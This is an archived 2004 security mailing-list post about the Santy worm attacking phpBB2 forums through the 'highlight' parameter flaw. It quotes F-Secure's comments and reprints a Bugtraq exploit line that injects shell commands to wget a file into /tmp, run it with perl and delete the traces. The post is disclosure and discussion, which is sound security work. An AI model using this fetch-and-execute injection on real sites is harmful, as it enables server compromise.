lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
From: zx at (Paul Laudanski)
Subject: RE: Worm hitting PHPbb2 Forums

On Thu, 23 Dec 2004, Patrick Nolan wrote:

> A bot is not uploaded, not sure where that came from.
> And by now, it is not expected to be spreading at all, thanks to the
> interruption in search requests by Google.

There are a couple posts going on about this, for instance take this 

"Santy gets easily corrupted," F-Secure Corp's Mikko Hypponen said. "The 
exploit it uses is only able to transfer around 20 bytes of data at a 
time. So the worm transfers itself from one web site to another in small 

"If a chunk gets missing, the worm might still work fine... or it might 
fail," Hypponen told ComputerWire. "More generations there are, more 
likely it is to fail because of this."

Compare that to an exploit that is posted @bugtraq:


rush=echo _START_; cd /tmp;wget -O .b; perl -pe 
.b| perl; rm -f .b *.pl b0t*; echo _END_

It is making use of the highlight exploit in pre phpbb 2.0.11.

Even though the 'worm' itself may be hindered, we can certainly expect 
script kiddies to attempt these manually.

Now that is catching the single quote in the highlight argument.


Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) -
Promoting education and health in online security and privacy.

Powered by blists - more mailing lists